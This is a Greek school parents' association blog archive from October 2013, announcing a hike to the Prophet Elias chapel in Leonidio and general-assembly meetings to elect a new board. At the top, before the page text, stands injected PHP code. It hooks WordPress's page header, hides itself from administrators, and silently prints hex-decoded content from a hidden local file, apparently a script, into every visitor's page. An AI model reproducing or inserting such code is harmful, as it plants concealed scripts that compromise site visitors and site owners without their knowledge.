if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Οκτώβριος, 2013 |

Monthly Archives: Οκτώβριος 2013

Πεζοπορία στο εκκλησάκι του Προφήτη Ηλία

Ο Σύλλογος Γονέων & Κηδεμόνων του Δημοτικού Σχολείου Λεωνιδίου, στο πλαίσιο των δράσεων του, διοργανώνει πεζοπορία την Κυριακή 3 Νοεμβρίου 2013, στο εκκλησάκι του Προφήτη Ηλία στο Λεωνίδιο.

Προσκαλούνται όλοι, γονείς & παιδιά, σε ένα διαφορετικό Κυριακάτικο πρωϊνό??

Σημείο συνάντησης: Δημοτικό Σχολείο Λεωνιδίου

Αναχώρηση: 10.00 π.μ.

Παρατηρήσεις: Όλοι οι πεζοπόροι να φορούν αθλητικά υποδήματα και να έχουν μαζί τους νερό.

Το Δ.Σ. του Συλλόγου Γονέων & Κηδεμόνων του Δημοτικού Σχολείου Λεωνιδίου

Πρόσκληση σε επαναληπτική γενική συνέλευση

Το Διοικητικό συμβούλιο του Συλλόγου Γονέων και Κηδεμόνων καλεί τους γονείς και κηδεμόνες των παιδιών του Δημοτικού Σχολείου Λεωνιδίου να λάβουν μέρος στην Επαναληπτική Γενική Συνέλευση που θα πραγματοποιηθεί την Παρασκευή 11 Οκτωβρίου 2013 και ώρα 18:00 στο Δημοτικό Σχολείο με θέμα:

Απολογισμός και Εκλογή νέου Διοικητικού Συμβουλίου

Όποιος γονιός ή κηδεμόνας επιθυμεί, μπορεί να είναι υποψήφιος υπογράφοντας και καταθέτοντας την σχετική αίτηση, μέχρι την Παρασκευή ώρα 12:00 στην Πρόεδρο του Συλλόγου Ελένη Λάστη.

Πρόσκληση σε γενική συνέλευση

Το Διοικητικό συμβούλιο του Συλλόγου Γονέων και Κηδεμόνων καλεί τους γονείς και κηδεμόνες των παιδιών του Δημοτικού Σχολείου Λεωνιδίου να λάβουν μέρος στην Γενική Συνέλευση που θα πραγματοποιηθεί την Παρασκευή 4 Οκτωβρίου 2013 και ώρα 18:00 στο Δημοτικό Σχολείο με θέμα:

Απολογισμός και Εκλογή νέου Διοικητικού Συμβουλίου

Σε περίπτωση που δεν υπάρχει προσέλευση από την πλειοψηφία των γονέων, οι εκλογές θα γίνουν οριστικά την επόμενη Παρασκευή στις 11-10-13 και ώρα 18:00.